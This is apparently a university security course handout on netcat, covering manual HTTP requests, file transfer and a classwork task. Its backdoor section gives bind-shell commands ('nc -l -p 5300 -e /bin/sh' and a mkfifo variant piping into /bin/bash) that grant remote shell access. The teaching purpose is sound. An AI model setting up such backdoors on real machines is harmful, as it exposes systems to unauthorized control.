´╗┐Netcat

Introduction

Netcat is described as the swiss army knife of TCP/IP. It does a lot, and knowing how to use it can be invaluable in security. It's not the optimal tool for many jobs, but it's a lot quicker to use than reinventing the wheel.

Basic usage

Netcat's most simplistic function can be seen as a replacement to telnet. Try the following:

$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
^M

Where it says ^M, you actually have to press control-v and then enter. This is to produce a carriage return as required by HTTP. Optionally, you can add more headers to your request:

$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
Accept: text/html;q=0.9,text/plain;q=0.8^M
User-Agent: Mozilla/5.0 (Unknown; en-us)^M
Accept-Language: en-us,en;q=0.5^M
^M

Another way to do this (which allows you to avoid pressing control-v all the time) is to pipe the output of some command to netcat. Here's an example:

$ ruby -e 'print "GET / HTTP/1.1\r\nHost: www.northwestern.edu\r\n\r\n"' | nc www.northwestern.edu 80

Common command line flags

Transferring files

One thing you might come across is a host you can access, but it's hard to get files onto their machine. Netcat can easily transfer files for you. On the machine that you want to receive the file:

$ nc -vv -l 3000 > file

And on the machine from which you want to send the file:

$ nc -vv hostname 3000 < file

These simple commands just shovel the contents of a file over a TCP/IP connection. If you try this, note that in many cases these transfers will be filtered by a firewall. Try transfering a file from a machine in the Wilkinson lab to hamsa.

Creating a simple backdoor

Netcat has the ability to execute programs when it receives a connection. This feature can be used to easily create a back door to a machine.

$ nc -l -p 5300 -e /bin/sh

And now from any machine:

$ nc target_ip 5300

However, the -e flag has been deprecated in more recent versions of netcat. You can emulate this behavior with something like the following, though it's not as quiet:

$ mkfifo foo; nc -l 5300 0<foo | /bin/bash 1>foo

Additional

There is a lot that you can do with netcat. A short tutorial doesn't quite do it justice. If you have time, it would be good to read through the man page (man netcat) or to search online for things to try with it.

Classwork

Show that you can successfully download the webpage www.google.com. Transfer an arbitrary file using netcat. Show that you can crete a netcat backdoor and demonstrate an understanding of netcat's usefulness as a TCP client and server.